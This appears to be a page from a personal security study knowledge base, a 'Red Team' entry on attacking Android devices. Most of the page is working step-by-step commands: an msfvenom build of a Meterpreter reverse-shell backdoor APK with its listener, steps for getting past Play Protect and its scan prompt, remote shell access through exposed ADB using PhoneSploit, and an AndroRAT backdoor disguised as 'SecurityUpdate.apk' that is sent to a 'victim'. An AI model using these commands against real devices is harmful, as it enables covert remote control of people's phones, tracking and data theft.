Security
  • IT Security Knowledge Base
  • Blue team
    • Linux System Hardening
    • Phishing Analysis
    • Snort
    • Yara
  • Capture the Flag
    • OverTheWire
      • Bandit
        • Bandit Level 0
        • Bandit Level 0 → Level 1
        • Bandit Level 1 → Level 2
        • Bandit Level 2 → Level 3
        • Bandit Level 3 → Level 4
        • Bandit Level 4 → Level 5
        • Bandit Level 5 → Level 6
        • Bandit Level 6 → Level 7
        • Bandit Level 7 → Level 8
        • Bandit Level 8 → Level 9
        • Bandit Level 9 → Level 10
        • Bandit Level 10 → Level 11
        • Bandit Level 11 → Level 12
        • Bandit Level 12 → Level 13
        • Bandit Level 13 → Level 14
        • Bandit Level 14 → Level 15
        • Bandit Level 15 → Level 16
        • Bandit Level 16 → Level 17
        • Bandit Level 17 → Level 18
        • Bandit Level 18 → Level 19
        • Bandit Level 19 → Level 20
        • Bandit Level 20→ Level 21
        • Bandit Level 21→ Level 22
        • Bandit Level 22 → Level 23
        • Bandit Level 23 → Level 24
        • Bandit Level 24 → Level 25
        • Bandit Level 25 → Level 26
        • Bandit Level 26 → Level 27
        • Bandit Level 27 → Level 28
        • Bandit Level 28 → Level 29
        • Bandit Level 29 → Level 30
        • Bandit Level 30 → Level 31
        • Bandit Level 31 → Level 32
        • Bandit Level 32 → Level 33
    • OWASP Juice Shop
      • Installation
      • Level 1 - Challenges
      • Level 2 - Challenges
    • TryHackMe Rooms
      • Anthem
      • Capture!
      • Corridor
      • Gotta Catch'em All!
      • Mustacchio
      • Neighbour
      • Opacity
      • Source
    • CEH v12 practical resources
  • Cryptology
    • CryptoHack
      • Course: Introduction to CryptoHack
        • Introduction - Challenges
        • General - Encoding
        • General - XOR
      • Course: Modular Arithmetic
        • General - Mathematics
        • Mathematics - Modular Math
        • Mathematics - Brainteasers Part 1
      • Course: Symmetric Cryptography
        • How AES Works
        • Symmetric Starter
        • Block Ciphers
        • Stream Ciphers
  • Red Team
    • Reconnaissance
      • Foot-printing
      • Scanning (Nmap)
      • Enumeration
    • Vulnerability Analysis
    • Initial Access
      • Obtaining credentials
      • Vulnerability Exploitation
        • Buffer Overflow
        • Metasploit and Armitage
        • Ninja Jonin
    • Active Directory
      • Connect to AD
      • AD Explore
      • CMD and PowerShell enumeration
      • Certificates in AD
      • LDAP Pass-back Attacks
      • Cracking NetNTLM Challenge with Responder
      • Exploring Configuration Files for AD Credentials
      • Pass the hash with evil WinRM
      • Understanding Runas
    • Malware
    • Sniffing
      • Intercept HTTP traffic - Hetty
      • Intercept HTTP traffic - Bettercap
      • Wireshark
    • Social Engineering
    • Denial of Service
    • Web Hacking
      • Burp Suite
      • OWASP ZAP
      • Web servers
      • Web Server Footprinting
      • Directory Enumeration
      • Session Hijacking
      • Web Shells
      • Web vulnerability scanners
      • SQL Injection
    • Cloud
    • Wireless Networks
      • Attacking WEP
      • Attacking WPA/WPA2
    • Mobile Devices
    • Network Security Evasion
    • Privileges Escalation
    • Maintain Access and Hide Malicious Activity
      • Backdooring
    • Cover your Tracks
  • Internet of Things
    • IoT in general
    • Common IoT Protocols
      • CoAP
      • MQTT
      • ZIGBEE
      • Bluetooth
    • Scapy
      • Sniffing and spoofing
      • ARP cache Poisoning
  • Projects
    • Cybersecurity Roadshow
Powered by GitBook
On this page
  • Metasploit - Android Backdoor
  • Android Debug Bridge (ADB) and PhoneSploit
  • Example of remote shell
  • AndroRAT
  1. Red Team

Mobile Devices

PreviousAttacking WPA/WPA2NextNetwork Security Evasion

Last updated 1 year ago

Metasploit - Android Backdoor

To create an Android Meterpreter reverse_tcp backdoor using Metasploit, follow these steps:

  1. Generate the Backdoor:

    Open your terminal and enter the following command: msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=<Attacker IP> R > Desktop/Backdoor.apk

    Explanation: This command generates a reverse Meterpreter application for Android and saves it as "Backdoor.apk" on your desktop.

  2. Set Up the Listener: Open Metasploit with msfconsole In the Metasploit console, type: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST >Attacker IP> set LPORT <Attacker IP> run

  3. Install the Application:

    • Transfer the generated "Backdoor.apk" to the target Android device and install it. Once installed, you will see an "App installed" notification. Click "OPEN."

    • Note that a "Blocked by Play Protect" pop-up may appear. Click "INSTALL ANYWAY" to proceed with the installation.

    • If a "send app for scanning?" pop-up appears, click "DON'T SEND" to bypass the scanning process.

Android Debug Bridge (ADB) and PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

is a a tool for remote ADB exploitation written in Python3.

Example of remote shell

Install ADB and PhoneSploit:

apt install adb
git clone https://github.com/aerosol-can/PhoneSploit

Navigate to the PhoneSploit directory:

cd PhoneSploit

Install the required dependency using Python3:

python3 -m pip install colorama

Launch PhoneSploit by running:

python3 phonesploit.py

In the PhoneSploit menu, type '3' to select the option for connecting a new phone.

When prompted to enter the target Android device's IP address, provide the IP address.

The target Android device will connect through port number 5555.

Back in the main menu, type '4' to access the shell on the target phone.

When prompted to enter a device name, type the target Android device's IP address.

You'll now have a shell command line.

AndroRAT

It offers a persistent backdoor to the targeted device. It automatically launching itself upon device boot-up. Once active, it can collect data, including the device's current location, SIM card information, IP address, and MAC address.

  1. Install:

    git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt

  2. To create an APK file (here, SecurityUpdate.apk): python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

  3. Transfer to victim

  4. start listening to the victim's machine: python3 androRAT.py --shell -i 0.0.0.0 -p 4444

  5. Once installed and executed (opened) on the victims Android device you'll have a remote shell.

is a tool created with the aim of granting remote control of an Android system to a user, while also enabling the retrieval of various information from the target device. This software operates as a client/server application, with the client side developed in Java Android, and the server component implemented in Python.

PhoneSploit
AndroRAT